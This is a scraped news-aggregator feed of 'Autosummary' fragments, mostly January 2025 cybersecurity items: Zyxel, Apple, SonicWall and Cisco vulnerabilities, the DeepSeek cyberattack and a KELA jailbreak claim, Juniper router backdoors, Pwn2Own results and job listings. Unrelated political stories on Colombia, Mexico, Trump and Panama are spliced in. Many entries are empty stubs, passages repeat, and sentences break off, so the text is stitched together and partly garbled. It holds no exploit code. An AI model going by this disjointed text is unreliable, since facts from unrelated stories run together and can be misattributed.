"Autosummary:
Therefore, many countries are looking for their way into the new technological order, investing in promising research and development in a variety of areas: AI and machine learning, quantum computing, optical electronics, new materials, energy sources and types of engines, satellites and telecommunications, genetics, biotechnology and medicine. The security of smart sensors, meters, measuring and control devices, and other devices in the Industrial Internet of Things is typically neglected by both the enterprises using them and, correspondingly, the developers themselves.For some reason, this problem is largely ignored by security researchers as well: while the security of endpoints and their key components, such as modems, is thoroughly studied, there are extremely few in-depth publications on the security of base stations or core network equipment.Moreover, the installation, initial setup, and regular maintenance of equipment requires the involvement of various third-party specialists, further expanding the attack surface of the supply chain and trusted partners. Both the AI systems and the unique enterprise data they use (either in its raw form – historical telemetry data – used as a training dataset, or as neural network weights incorporated into the AI model), if they become crucial assets, may now be new cyberattack targets. "Autosummary:
Attackers can leverage this vulnerability to execute arbitrary commands on affected devices, leading to complete system compromise, data exfiltration, or network infiltration” - GreyNoise Internet scanning service Censys reports that there are more than 1,500 Zyxel CPE Series devices currently exposed online, mostly in the Philippines, Turkey, the United Kingdom, France, and Italy. "Autosummary:
The January 2024 non-security preview update comes with additional fixes and improvements, some of the more significant ones listed below: [USB cameras] Fixed: Your device does not recognize the camera is on. "CVE-2024-40891, a command injection vulnerability in Zyxel CPE Series telecommunications devices that has yet to be fixed by the manufacturer, is being targeted by attackers, cybersecurity company Greynoise has warned. Successful exploitation would allow attackers to execute arbitrary commands on affected devices, potentially leading to complete system compromise, network infiltration, and data exfiltration. “After identifying a significant overlap between IPs exploiting CVE-2024-40891 and those classified as Mirai, the team investigated a recent variant of Mirai … More
The post Zyxel CPE devices under attack via critical vulnerability without a patch (CVE-2024-40891) appeared first on Help Net Security.
"Autosummary:
Preventing exploitation Censys.io, a web platform for identify internet-connected assets, currently shows some 1,500 vulnerable devices, mostly in the Philippines, Turkey, and Europe. "Swimlane announced Vulnerability Response Management (VRM) Solution that extends beyond siloed vulnerability management by offering risk-based prioritization, exploit intelligence and recommended remediation workflows. Swimlane AI automation solutions combine the power of AI with human expertise, enabling faster, more accurate decision-making and empowering security teams to act confidently. VRM is designed to help enterprise and MSSP security teams proactively reduce risk, prevent breaches and ensure continuous compliance. With an overwhelming volume to manage, 68% of organizations … More
The post Swimlane Vulnerability Response Management offers risk-based prioritization appeared first on Help Net Security.
"Autosummary:
Customers will benefit from standout capabilities, including: Swimlane Intelligence: VRM picks up where vulnerability scanners stop, using AI and automation to enrich findings with Swimlane Intelligence, such as known exploits, temporal Common Vulnerability Scoring System (CVSS) scores, remediation information, with over 30 out-of-the-box enrichment and customizable sources. VRM picks up where vulnerability scanners stop, using AI and automation to enrich findings with Swimlane Intelligence, such as known exploits, temporal Common Vulnerability Scoring System (CVSS) scores, remediation information, with over 30 out-of-the-box enrichment and customizable sources. "As US-based AI companies struggle with the news that the recently released Chinese-made open source DeepSeek-R1 reasoning model performs as well as theirs for a fraction of the cost, users are rushing to try out DeepSeek’s AI tool. In the process, they have pushed it to the top of the list of most popular iOS and Android apps. DeepSeek name abused for scams and malware delivery The company has reportedly been dealing with outages and … More
The post DeepSeek’s popularity exploited by malware peddlers, scammers appeared first on Help Net Security.
"Autosummary:
We should expect DeepSeek to be misused by criminals to create materials used in phishing and BEC campaigns (e.g., emails in different languages, without typos, replicating the tone and writing style of the impersonated sender), set up fraudulent sites mimicking legitimate publishers or fake, fraudulent online stores, innundate legitimate stores with AI-generated product reviews, and so on. "Autosummary:
"Autosummary:
The vulnerability impacts iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. "Autosummary:
"Application Security Engineer Bumble | United Kingdom | Hybrid – View job details As an Application Security Engineer, you will design and implement security testing tools within CI/CD pipelines to detect vulnerabilities early without impacting development speed. Conduct risk assessments and threat modelling exercises to identify potential vulnerabilities and prioritise security measures based on impact. Identify and prioritise vulnerabilities, driving remediation efforts and offering mitigation strategies to engineering teams. CISO Global-e | Israel | On-site … More
The post Cybersecurity jobs available right now: January 28, 2025 appeared first on Help Net Security.
"Autosummary:
Cyber Defense, Monitoring & Incident Management Mizuho | USA | Hybrid – View job details As a Cyber Defense, Monitoring & Incident Management, you will oversee tools, technologies, and processes related to security operations, including vulnerability management, data loss prevention, EDR/NDR/XDR.Define cyber security governance and control strategies for emerging technologies such as cloud & containerization, block-chain, etc. I have read and agree to the terms & conditions Leave this field empty if you"re human: Cloud Advisory (IAM) Architect Slalom | Canada | On-site – View job details As a Cloud Advisory (IAM) Architect, you will lead the design and implementation of IAM architectures, including client and workforce identity solutions, integrating zero trust principles to secure users, devices, and applications. Senior Security Advisor – Cyber Supply Chain Risk Management Intact | Canada | Hybrid – View job details As a Senior Security Advisor – Cyber Supply Chain Risk Management, you will develop, implement, and enhance programs that monitor, measure, analyze and report on third-party risk exposures across all business areas and compare against the organization’s risk appetite. Incident Response Lead Trimble | Germany | Remote – View job details As an Incident Response Lead, you will lead the incident management process for the family of events, including platform/product incidents, cyberattacks, data protection, or information security hazards. Head of Cyber Defense Center CMA CGM | France | On-site – View job details As a Head of Cyber Defense Center, you will build and maintain an efficiently functional and collaborative CDC model with the appropriate interfaces, processes and workflows between SOC, incident response, vulnerability management, and threat intelligence functions. "Autosummary:
"Autosummary:
"During the pre-training stage, training DeepSeek-V3 on each trillion tokens requires only 180K H800 GPU hours, i.e., 3.7 days on our cluster with 2048 H800 GPUs," the company said in a study. "Autosummary:
Chinese AI platform DeepSeek faced a “large-scale” cyberattack Pierluigi Paganini January 28, 2025 January 28, 2025 Chinese AI company DeepSeek has disabled registrations for its DeepSeek-V3 chat platform following a “large-scale” cyberattack. "Autosummary:
While ChatGPT-maker OpenAI has been haemorrhaging money - spending $5bn last year alone - DeepSeek"s developers say it built this latest model for a mere $5.6m. That is a tiny fraction of the cost that AI giants like OpenAI, Google, and Anthropic have relied on to develop their own models. "Regula has launched the portable and autonomous ForensicScope Regula 4125. The new device enables ID verification in any place and environment: at border and inland checkpoints, at airports, in transport, etc. Although the Regula 4125 is only smartphone-sized, it is capable of performing a wide range of document checks typical for professional forensic equipment. The new Regula 4125 is particularly effective at detecting morphing in photos in identity documents. Face morphing is an insidious threat … More
The post ForensicScope Regula 4125 detects counterfeit documents appeared first on Help Net Security.
"Autosummary:
The device is equipped with three cameras: the main one, an infrared (IR) one for full-page visualization, and a special camera for detecting face morphing. "Apple has shipped a fix for a zero-day vulnerability (CVE-2025-24085) that is being leveraged by attackers against iPhone users. About CVE-2025-24085 CVE-2025-24085 is a use after free bug in CoreMedia, a framework used by Apple devices for the processing of media data. The vulnerability can be triggered by a malicious application and may allow attackers to elevate privileges on targeted devices. “Apple is aware of a report that this issue may have been actively exploited … More
The post Apple zero-day vulnerability exploited to target iPhone users (CVE-2025-24085) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
To detect attacks that involve the use of SSH tunneling on ESXi appliances, organizations have been recommended to review the below four log files - /var/log/shell.log (ESXi shell activity log) /var/log/hostd.log (Host agent log) /var/log/auth.log (authentication log) /var/log/vobd.log (VMware observer daemon log) "Autosummary:
"Autosummary:
The PowerSchool cyberattack PowerSchool is a cloud-based K-12 software provider serving over 60 million students and 18,000 customers worldwide, offering enrollment, communication, attendance, staff management, learning, analytics, and finance solutions. "Autosummary:
" Scareware blocker settings (Microsoft) When the scareware blocker spots a potentially malicious page, Edge gives control back to the user, exiting full-screen mode, halting loud audio, displaying a warning, and showing a thumbnail of the page. "Autosummary:
Devices affected are those that run: iPhone XS and later iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later macOS Sequoia Apple Watch Series 6 and later All models of Apple TV HD and Apple TV 4K If you use any of these then you should install updates as soon as you can. "Autosummary:
"Autosummary:
"Autosummary:
"They are Colombians, free and dignified, and in their homeland where they are loved," he wrote on X. He also posted photos of the migrants getting off the plane without handcuffs. "Autosummary:
"America will reclaim its rightful place as the greatest, most powerful, most respected nation on Earth, inspiring the awe and admiration of the entire world," Trump said at the time. "Autosummary:
" To counter such attacks, it"s recommended to develop advanced filtering techniques that can detect hidden text salting and content concealment, including detecting use of CSS properties like "visibility" and "display," and adopt visual similarity detection approach (e.g., Pisco) to enhance detection capabilities. "Autosummary:
Once inside, the attackers ran cmd.exe commands like "net" and "nltest" to gather intelligence about the system, including a list of user accounts, groups, shared resources, and domain controllers, and test Active Directory"s connectivity. "This article showcases free, open-source cybersecurity tools that help you identify and address vulnerabilities, detect intrusion, protect websites from cyber attacks, monitor and detect suspicious activities across your network. Am I Isolated: Open-source container security benchmark Am I Isolated is an open-source container security benchmark that probes users’ runtime environments and tests for container isolation. Argus: Open-source information gathering toolkit Argus is an open-source toolkit that simplifies information gathering and reconnaissance. It features a user-friendly … More
The post Don’t let these open-source cybersecurity tools slip under your radar appeared first on Help Net Security.
"Autosummary:
Evilginx: Open-source man-in-the-middle attack framework Evilginx is an open-source man-in-the-middle attack framework designed to phish login credentials and session cookies, enabling attackers to bypass 2FA safeguards. Aranya: Open-source toolkit to accelerate secure by design concepts By leveraging the Aranya toolkit, developers can embed secure by design concepts into their products, enabling high-assurance message delivery, secure data exchange, and access control between applications, machines, and sensors without requiring additional security tools. Neosync: Open-source data anonymization, synthetic data orchestration Neosync is an open-source, developer-centric solution designed to anonymize PII, generate synthetic data, and synchronize environments for improved testing and debugging. "Autosummary:
"While @Delfin claims to be selling JinxLoaderV2 unchanged, @AstolfoLoader opted to rebrand the malware and modify the stub to C++ (Jinx V3), instead of using the original Go-compiled binary," BlackBerry noted late last year. "Autosummary:
"Your blockade does not scare me, because Colombia, besides being the country of beauty, is the heart of the world," he said. "Autosummary:
Petro went on to describe himself as "stubborn" and said that while Trump could try to "carry out a coup" with "economic strength and arrogance" he would, in short, fight back.Trump"s pick for deputy Secretary of State, Christopher Landau, has long argued that "working with other countries to stop such migratory flows" must be a "global imperative of US foreign policy". "Autosummary:
"Autosummary:
“ (VMware observer daemon log) “ /var/log/shell.log (ESXi shell activity log) (ESXi shell activity log) /var/log/hostd.log (Host agent log) (Host agent log) /var/log/auth.log (authentication log) “ The report provided multiple examples of common activities and messages found in ESXi syslog files that might be associated to malicious activity. "Autosummary:
Here is an overview of the three ways the Clone2Leak attack can manifest by exploiting various flaws: Carriage return smuggling (CVE-2025-23040 and CVE-2024-50338) – GitHub Desktop and Git Credential Manager misinterpret carriage return (\r) characters in URLs. "Autosummary:
Billing, claims, and payment information: Claim numbers, account numbers, billing codes, payment card details, financial and banking information, payments made, and balances due. Health information: Medical record numbers, providers, diagnoses, medicines, test results, images, and details of care and treatment. Health insurance information: Details about primary, secondary, or other health plans/policies, insurance companies, member/group ID numbers, and Medicaid-Medicare-government payor ID numbers. "Autosummary:
Observers, both independent and internationally recognised, as well as local monitors, concluded that the elections failed to meet the standards of fairness and freedom. "Autosummary:
" The list of identified vulnerabilities is as follows - CVE-2025-23040 (CVSS score: 6.6) - Maliciously crafted remote URLs could lead to credential leaks in GitHub Desktop (CVSS score: 6.6) - Maliciously crafted remote URLs could lead to credential leaks in GitHub Desktop CVE-2024-50338 (CVSS score: 7.4) - Carriage-return character in remote URL allows the malicious repository to leak credentials in Git Credential Manager (CVSS score: 7.4) - Carriage-return character in remote URL allows the malicious repository to leak credentials in Git Credential Manager CVE-2024-53263 (CVSS score: 8.5) - "Autosummary:
This week"s list includes — CVE-2025-23006 (SonicWall), CVE-2025-20156 (Cisco Meeting Management), CVE-2025-21556 (Oracle Agile Product Lifecycle Management Framework), CVE-2025-0411 (7-Zip), CVE-2025-21613 (go-git), CVE-2024-32444 (RealHomes theme for WordPress), CVE-2024-32555 (Easy Real Estate plugin), CVE-2016-0287 (IBM i Access Client Solutions), CVE-2024-9042 (Kubernetes). — A group of academics has disclosed 119 security vulnerabilities impacting LTE and 5G implementations, Open5GS, Magma, OpenAirInterface, Athonet, SD-Core, NextEPC, srsRAN, that could be exploited by an attacker to disrupt access to service and even gain a foothold into the cellular core network.Over 100 Flaws in LTE and 5G Implementations — A group of academics has disclosed 119 security vulnerabilities impacting LTE and 5G implementations, Open5GS, Magma, OpenAirInterface, Athonet, SD-Core, NextEPC, srsRAN, that could be exploited by an attacker to disrupt access to service and even gain a foothold into the cellular core network.Active since at least 2019, the group has singled out individuals and entities in China, Taiwan, Hong Kong, South Korea, the United States, and New Zealand.Active since at least 2019, the group has singled out individuals and entities in China, Taiwan, Hong Kong, South Korea, the United States, and New Zealand.Critical Security Flaws in ABB ASPECT-Enterprise, NEXUS, and MATRIX Products — More than a 100 security flaws have been disclosed in ABB ASPECT-Enterprise, NEXUS, and MATRIX series of products that could enable an attacker to disrupt operations or execute remote code. — A never-before-seen China-aligned hacking group named PlushDaemon carried out a supply chain attack targeting a South Korean virtual private network (VPN) provider in 2023 to deliver malware known as SlowStepper, a fully-featured backdoor with an extensive set of information gathering features.PlushDaemon Linked to Supply Chain Compromise of South Korean VPN Provider — A never-before-seen China-aligned hacking group named PlushDaemon carried out a supply chain attack targeting a South Korean virtual private network (VPN) provider in 2023 to deliver malware known as SlowStepper, a fully-featured backdoor with an extensive set of information gathering features. — One of the vulnerabilities exploited by the China-linked Salt Typhoon hacking group for initial access is CVE-2021-26855 (aka ProxyLogon), a nearly four-year-old flaw in Microsoft Exchange Server. "Autosummary:
"Autosummary:
"Autosummary:
Microsoft impersonated by Midnight Blizzard-controlled account (Microsoft) "If your organization enables Teams external access, we will check for potential impersonation activity when your user receives a message from an external sender for the first time," Microsoft added. "Autosummary:
A threat actor named “b0nd” claimed the theft of data of over 18.8 million TalkTalk subscribers’ data, including names, email addresses, IP addresses, phone numbers, and PINs. "Autosummary:
"KELA"s AI Red Team was able to jailbreak the model across a wide range of scenarios, enabling it to generate malicious outputs, such as ransomware development, fabrication of sensitive content, and detailed instructions for creating toxins and explosive devices. "Autosummary:
The vulnerability impacts iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later. "Autosummary:
Cisco warns of a ClamAV bug with PoC exploit Pierluigi Paganini January 26, 2025 January 26, 2025 Cisco addressed a ClamAV denial-of-service (DoS) vulnerability, and experts warn of the availability of a proof-of-concept (PoC) exploit code. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: 48,000+ internet-facing Fortinet firewalls still open to attack Despite last week’s confirmation of and warnings about long-standing exploitation of CVE-2024-55591, a critical vulnerability affecting Fortinet Fortigate firewalls, too many vulnerable devices are still accessible from the Internet and open to attack: over 48,000, according to data from the Shadowserver Foundation. Ransomware attackers are “vishing” organizations via Microsoft Teams The “email … More
The post Week in review: 48k Fortinet firewalls open to attack, attackers “vishing” orgs via Microsoft Teams appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: 48,000+ internet-facing Fortinet firewalls still open to attack Despite last week’s confirmation of and warnings about long-standing exploitation of CVE-2024-55591, a critical vulnerability affecting Fortinet Fortigate firewalls, too many vulnerable devices are still accessible from the Internet and open to attack: over 48,000, according to data from the Shadowserver Foundation. "Autosummary:
As well as protection from the elements, the deportees will receive food, medical care, and assistance in obtaining Mexican identity documents, under a deportee-support programme which President Claudia Sheinbaum"s administration calls "Mexico Embraces You"." In his first days in office, President Trump signed a directive ordering officials to relaunch efforts to build the border wall with Mexico Furthermore, another key part of Mr Trump"s executive orders includes a policy called "Remain in Mexico" under which immigrants awaiting dates to make their asylum cases in a US immigration court would have to stay in Mexico ahead of those appointments. "Autosummary:
This stolen data includes patients" health insurance information, medical records, billing and payment information, and sensitive personal information, such as phone numbers, addresses, and, in some cases, Social Security Numbers and government ID numbers. "Autosummary:
"Autosummary:
"Autosummary:
“Our experts are working to address the matter and we are working closely with law enforcement and leading third-party consultants, Mandiant and Palo Alto Network, on this attack against Change Healthcare’s systems” Compromised data includes names, addresses, dates of birth, phone numbers, driver’s license or state ID numbers, Social Security numbers, diagnosis and treatment information, medical record numbers, billing codes, insurance member IDs, and other types of information. "Autosummary:
"These measures are just the beginning," Trump added, saying his administration would not allow the Colombian government "to violate its legal obligations with regard to the acceptance and return of the criminals they forced into the United States". "Autosummary:
With 30.5 points and $222,250 awarded, Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) is our Master of Pwn. #P2OAuto pic.twitter.com/pLaUeZwzZm — Zero Day Initiative (@thezdi) January 24, 2025 On the third day bug hunters earned $168,000 for exploiting 10 zero-day vulnerabilities. "Autosummary:
"Aviat Networks announced that it has enhanced its Secure Software Development Lifecycle (SSDLC) process and Software Vulnerability Alert (SVA) service designed to strengthen Aviat’s software and firmware development process to comply with latest cybersecurity requirements. With the increasing number of vulnerabilities, threats and attacks, SSDLC and SVA are now seen as essential countermeasures to protect against software security threats for critical communications networks. Aviat’s SSDLC is a structured process to improve cybersecurity for all Aviat … More
The post Aviat Networks enhances software cybersecurity offering appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Some organizations also face difficulties with provider selection and feasibility (15%), post-migration management (14%), right-sizing cloud instances (8%), licensing complexities (7%) and managing application dependencies (5%). How organizations are securing backup infrastructure The majority of organizations report having policies and controls in place to secure access to their backups across key areas, including public cloud (77%), servers or virtual machines (76%), SaaS applications (74%) and endpoints/PCs (73%).The survey reveals distinct pain points for users of Microsoft 365, Google Workspace and Salesforce: Data recovery issues : Google Workspace (23%) and Salesforce (23%) users report the highest rates of difficulty with data recovery, compared to 20% of Microsoft 365 users. Recovery of SaaS data objects The frequency of recovering SaaS data objects is as follows: Most frequently recovered : Email (20%) and mail contacts (17%) are restored daily, emphasizing their critical role in communication and business continuity. Diverging SaaS adoption trends between SMBs and enterprises The survey also highlighted distinct preferences between SMBs and enterprise organizations when it comes to SaaS tools: SMBs favor applications that simplify everyday operations and finance management, such as: Google Workspace : 38% of SMBs vs. 32% of enterprises. : Google Workspace users (11%) are most challenged in setting up and managing alerts, surpassing Microsoft 365 (8%) and Salesforce (8%) users. : Google Workspace (23%) and Salesforce (23%) users report the highest rates of difficulty with data recovery, compared to 20% of Microsoft 365 users. "Autosummary:
SonicWall warns of a critical CVE-2025-23006 zero-day likely exploited in the wild Pierluigi Paganini January 24, 2025 January 24, 2025 SonicWall warns customers of a critical zero-day vulnerability in SMA 1000 Series appliances, likely exploited in the wild. "Autosummary:
"Autosummary:
"Autosummary:
Out of the 56 commands supported in total, the following are particularly dangerous: /machine_id*browsers – Steal saved passwords, cookies, and autofill data from web browsers – Steal saved passwords, cookies, and autofill data from web browsers /machine_id*keylogger – Record everything the victim types on their computer – Record everything the victim types on their computer /machine_id*desktop – Capture the victim’s active screen – Capture the victim’s active screen /machine_id*encrypt*<password> - Encrypt all files on the system using a provided password - Encrypt all files on the system using a provided password /machine_id*processkill*<process> - Terminate specific running processes, including security software - Terminate specific running processes, including security software /machine_id*upload*<file> - "Autosummary:
The car manufacturers involved in that complaint are Toyota, Lexus, Mazda, Chrysler, Dodge, Fiat, Jeep, Maserati, and Ram. "Autosummary:
J-magic malware campaign targets Juniper routers Pierluigi Paganini January 24, 2025 January 24, 2025 Threat actors are targeting Juniper routers with a custom backdoor in a campaign called code-named “J-magic,” attackers are exploiting a Magic Packet flaw. "Autosummary:
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a SonicWall SMA1000 Appliance Management Console (AMC) and Central Management Console (CMC) vulnerability, tracked as CVE-2025-23006 to its Known Exploited Vulnerabilities (KEV) catalog. "In this Help Net Security video, Or Salom, Analyst at YL Ventures, discusses the State of the Cyber Nation Report 2024. The report reveals resilience and growth in the Israeli cybersecurity industry, with total investments reaching $4 billion across 89 funding rounds—more than double the $1.89 billion raised in 2023. Key highlights: Record-breaking seed activity: 50 seed rounds in 2024 with total seed funding reaching $400M, demonstrating sustained confidence in early-stage Israeli cybersecurity innovation. Explosive … More
The post Funding soars in a milestone year for Israeli cybersecurity appeared first on Help Net Security.
"Autosummary:
"The Web Cache Vulnerability Scanner (WCVS) is an open-source command-line tool for detecting web cache poisoning and deception. The scanner, developed by Maximilian Hildebrand, offers extensive support for various web cache poisoning and deception techniques. It features a built-in crawler to discover additional URLs for testing. The tool is designed to adapt to specific web caches for enhanced testing efficiency, is customizable, and integrates into existing CI/CD pipelines. Features Analyzing a web cache before testing … More
The post Web Cache Vulnerability Scanner: Open-source tool for detecting web cache poisoning appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Appdome announced that a new AI-Native threat-management module called Threat Dynamics will be offered inside Appdome’s ThreatScope Mobile XDR. Threat Dynamics uses AI deep learning to continuously evaluate the likelihood of a successful exploit from more than 400+ attack vectors and calculate a Mobile Risk Index for each business and mobile application. This allows businesses to see how threats move across the production environment, empowering them to quickly prioritize and focus on the attack vectors … More
The post Appdome Threat Dynamics analyzes and ranks mobile threats appeared first on Help Net Security.
"Autosummary:
Trends such as Infection Rate, Attack Frequency, Attack Velocity, Cohort Placement, Variance, Projected Impact, and more are provided for each attack, application, release, device, OS, geographic source, and other dimensions. By analyzing this data from multiple perspectives, mobile businesses can see how cyber-attacks, fraud, and threats move across the mobile business and use Appdome’s Threat Dynamics to identify fraud and cyber-attack patterns early on, rank the potential impact of each attack prospectively, and preempt cyber-attacks, fraud, and threats before the attacks proliferate. "A critical zero-day vulnerability (CVE-2025-23006) affecting SonicWall Secure Mobile Access (SMA) 1000 Series appliances is being exploited by attackers. “We strongly advises users of the SMA1000 product to upgrade to the hotfix release version to address the vulnerability,” the company said on Wednesday. About CVE-2025-23006 SonicWall Secure Mobile Access (SMA) is a unified secure access gateway used by organizations to provide employees access to applications from anywhere. The SMA 1000 series of appliances is aimed … More
The post SonicWall SMA appliances exploited in zero-day attacks (CVE-2025-23006) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Tracking Technologies That said, even well-established third-party apps can increase an organization"s level of web exposure, particularly tracking apps, as the chart below shows: The Facebook and TikTok pixels, for example, have been known to collect private user information after being misconfigured.It analyzes the huge number of data points it gathers from scanning millions of websites by considering each risk factor in context, adds them together to create an overall level of risk, and expresses this as a simple grade, from A to F, with added remediation advice. If you aren"t familiar with the term web exposure, it was coined by Gartner to describe the range of risks that modern websites face because they connect with dozens of essential third-party apps, CDN repositories, and open source tools that help with tracking and functionality tasks. "Autosummary:
" The BC malware has also been the subject of an independent analysis by Sophos, which attributed the artifacts to a threat cluster it tracks as STAC5777, which, in turn, overlaps with Storm-1811, a cybercriminal group known for abusing Quick Assist for Black Basta ransomware deployment by posing as tech support personnel. "Autosummary:
Cisco addresses a critical privilege escalation bug in Meeting Management Pierluigi Paganini January 23, 2025 January 23, 2025 Cisco addressed a critical flaw in its Meeting Management that could allow it to gain administrator privileges on vulnerable instances. "Autosummary:
Yesterday, Bishop Fox researchers published a video showcasing their exploit of CVE-2024-53704, promising to disclose the complete details on February 10, 2025. "Autosummary:
“We suspect that the developer has added this RSA challenge to prevent other threat actors from spraying the internet with magic packets to enumerate victims and then simply repurposing, the J-Magic agents for their own purposes” - Black Lotus Labs Although the activity shares technical similarities with the SeaSpy malware, also based on the cd00r backdoor, some differences make it difficult to establish a connection between the two campaigns. "Cisco has released patches for a critical privilege escalation vulnerability in Meeting Management (CVE-2025-20156) and a heap-based buffer overflow flaw (CVE-2025-20128) that, when triggered, could terminate the ClamAV scanning process on endpoints running a Cisco Secure Endpoint Connector. Proof-of-concept (PoC) exploit code for CVE-2025-20128 is available, Cisco said, but the company is not aware of the vulnerability being exploited in the wild. Credit for reporting the flaw has been given to OSS-Fuzz, Google’s continuous fuzzing … More
The post Cisco fixes ClamAV vulnerability with available PoC and critical Meeting Management flaw appeared first on Help Net Security.
"Autosummary:
The company has confirmed that its Secure Email Gateways and Secure Web Appliances are unaffected, but Cisco Secure Endpoint Connectors for Windows, Linux and macOS – distributed from Cisco Secure Endpoint Private Cloud – are, and all of them should be upgraded to a fixed release: 7.5.20 or 8.4.31 (for Windows), 1.25.1 (for Linux), 1.24.4 (for macOS). "Autosummary:
"Autosummary:
"The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world," Leandro Fróes, senior threat research engineer at Netskope Threat Labs, said in a report shared with The Hacker News. "Autosummary:
They are both configured to exclude the \Windows\System32 folder, as well as a hard-coded list of extensions from the encryption process, namely .dll, .sys, .exe, .drv, .com, and .cat, from the encryption process. "Autosummary:
A CISA and FBI published a joint advisory warning that Chinese hackers exploited four Ivanti flaws (CVE-2024-8963, CVE-2024-9379, CVE-2024-8190, CVE-2024-9380) to achieve remote code execution, steal credentials, and deploy webshells. "Autosummary:
Most recently, infostealers enabled high-impact attacks on PowerSchool, HotTopic, CircleCI, and Snowflake. "Autosummary:
CISA added them to its Known Exploited Vulnerabilities Catalog and ordered Federal Civilian Executive Branch (FCEB) agencies to secure their appliances as mandated by Binding Operational Directive (BOD) 22-01. "According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks," the U.S. cybersecurity agency said on Wednesday. "A stealthy attack campaign turned Juniper enterprise-grade routers into entry points to corporate networks via the “J-magic” backdoor, which is loaded into the devices’ memory and spawns a reverse shell when instructed to do so. “Our telemetry indicates the J-magic campaign was active from mid-2023 until at least mid-2024; in that time, we observed targets in the semiconductor, energy, manufacturing, and IT verticals among others,” Lumen’s Black Lotus Labs team researchers shared. The J-magic malware … More
The post Juniper enterprise routers backdoored via “magic packet” malware appeared first on Help Net Security.
"Autosummary:
“Our telemetry indicates the J-magic campaign was active from mid-2023 until at least mid-2024; in that time, we observed targets in the semiconductor, energy, manufacturing, and IT verticals among others,” Lumen’s Black Lotus Labs team researchers shared. "Autosummary:
Infections have been reported across Europe, Asia, and South America, including Argentine, Armenia, Brazil, Chile, Colombia, Indonesia, the Netherlands, Norway, Peru, the U.K., the U.S., and Venezuela. "Autosummary:
“Passing HTML containing <option> elements from untrusted sources – even after sanitizing them – to one of jQuery’s DOM manipulation methods (i.e. .html() , .append() , and others) may execute untrusted code.” reads the advisory. "Autosummary:
Pwn2Own Automotive 2025 Day 2: organizers awarded $335,500 Pierluigi Paganini January 23, 2025 January 23, 2025 Bug hunters earned $129,000 for Tesla charger exploits and over $700,000 total in two days at Pwn2Own Automotive 2025. "Autosummary:
“Passing HTML containing <option> elements from untrusted sources – even after sanitizing them – to one of jQuery’s DOM manipulation methods (i.e. .html() , .append() , and others) may execute untrusted code.” reads the advisory. "This list of ransomware-focused cybersecurity books is tailored for professionals seeking practical insights and deeper knowledge. Covering technical strategies, real-world cases, and the evolving tactics of attackers, these books offer valuable perspectives to help strengthen defenses and refine incident response plans. Ransomware and Cyber Extortion: Response and Prevention Authors: Karen Sprenger, Sherri Davidoff, and Matt Durrin This guide offers value to everyone involved in prevention, response, planning, or policy: CIOs, CISOs, incident responders, investigators, negotiators, … More
The post Cybersecurity books on ransomware you shouldn’t miss appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web to the extracted files. "Autosummary:
Thousands of people have sought shelter in a sports stadium in the city of Cúcuta Investigative news programme Noticias Uno said it had seen a military intelligence report which suggested that the surge in violence between the two rival groups had been triggered by "the loss of a multi-million-dollar cocaine shipment in November 2024". "Autosummary:
– Gathers a variety of system details, including CPU brand, HDD serial numbers, computer and hostname, public IP address, running processes, installed applications, network interfaces, system memory, webcam, and microphone status, and whether the OS is running in a virtual machine. "Autosummary:
Synacktiv Team is in third place on the leaderboard and took home $57,500 after successfully demoing a bug in the OCPP protocol to hack the ChargePoint Home Flex (Model CPH50) using signal manipulation through the connector, Security researchers from PHP Hooligans also successfully hacked a fully patched Autel charger using a heap-based buffer overflow and earned $50,000, while the Viettel Cyber Security team collected $20,000 after obtaining code execution on the Kenwood In-Vehicle Infotainment (IVI) using an OS command injection zero-day. "Autosummary:
7-Zip does not have an auto-update function, so you will have to download the version that is suitable for your system from the 7-Zip downloads page. "Autosummary:
Some of the other flaws weaponized by the distributed denial-of-service (DDoS) botnet include CVE-2013-3307, CVE-2016-20016, CVE-2017-5259, CVE-2018-14558, CVE-2020-25499, CVE-2020-8515, CVE-2022-3573, CVE-2022-40005, CVE-2022-44149, CVE-2023-28771, as well as those impacting AVTECH IP cameras, LILIN DVRs, and Shenzhen TVT devices. "Autosummary:
"Autosummary:
" However, one day later, after being asked to confirm if a cyberattack caused the outage, Conduent sent an updated statement saying the "operational disruption" was caused by "a cyber security incident. "Autosummary:
"In alignment with the Department of Homeland Security"s (DHS) commitment to eliminating the misuse of resources and ensuring that DHS activities prioritize our national security, I am directing the termination of all current memberships on advisory committees within DHS, effective immediately," Acting Secretary Benjamine C. Huffman said in a January 20, 2025, memo. "Autosummary:
This "package of Chinese activities", as described by Mr Thomas, might have prompted Trump"s assertion that the canal is "owned" by China, but operation of those ports does not equate to ownership, he stresses.On Christmas Day, Trump posted on social media that the "wonderful soldiers of China" were "lovingly, but illegally, operating the Panama Canal" - a claim which was swiftly denied by officials in Panama City and Beijing. "Autosummary:
Once registered as an administrator, the attacker can subsequently gain full control of the WordPress site, including performing content manipulation, planting scripts, and accessing user or other sensitive data. "Autosummary:
#P2OAuto pic.twitter.com/UEhsCMG4mg — Zero Day Initiative (@thezdi) January 22, 2025 Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam) received the biggest reward, $50,000 and 5 Master of Pwn points, for demonstrating a hard-coded cryptographic key bug in the Ubiquiti charger. "Autosummary:
